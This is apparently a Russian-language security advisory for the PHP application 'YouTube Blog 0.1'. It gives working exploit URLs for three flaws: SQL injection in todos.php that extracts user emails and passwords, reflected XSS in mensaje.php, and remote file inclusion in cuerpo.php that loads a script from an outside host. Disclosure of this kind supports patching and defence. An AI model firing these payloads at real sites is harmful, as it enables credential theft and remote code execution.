Программа: YouTube Blog 0.1
Найденные уязвимости позволяют удаленному злоумышленнику осуществить XSS
атаку, выполнить произвольный PHP сценарий и выполнить произвольный SQL код в
базе данных приложения.
1) Уязвимость возникает из-за ошибки в проверке входных данных сценарием
todos.php. Удаленный пользователь может с помощью специально сформированного
запроса выполнить произвольные SQL команды в базе данных приложения.
Эксплоит:
http://victim/ytb/todos.php?id=-99+union+select+1,2,mail,
contrasena,5,6,7+from+ytb_usuarios+where+id=1/*
2) Уязвимость возникает из-за ошибки в проверке входных данных сценарием
mensaje.php. Атакующий может выполнить произвольный сценарий в браузере жертвы в
контексте безопасности уязвимого сайта.
Эксплоит:
http://victim/ytb/mensaje.php?m=<script>alert(/xss/)</script>
3) Уязвимость возникает из-за ошибки в проверке входных данных сценарием
cuerpo.php. Удаленный пользователь может выполнить произвольный PHP сценарий на
целевой системе с привилегиями Web сервера. Успешное эксплуатирование уязвимости
требует включение опции "register_globals" в конфигурационном файле PHP.
Эксплоит:
http://victim/ytb/cuenta/cuerpo.php?base_archivo=http://192.168.1.111/blah.txt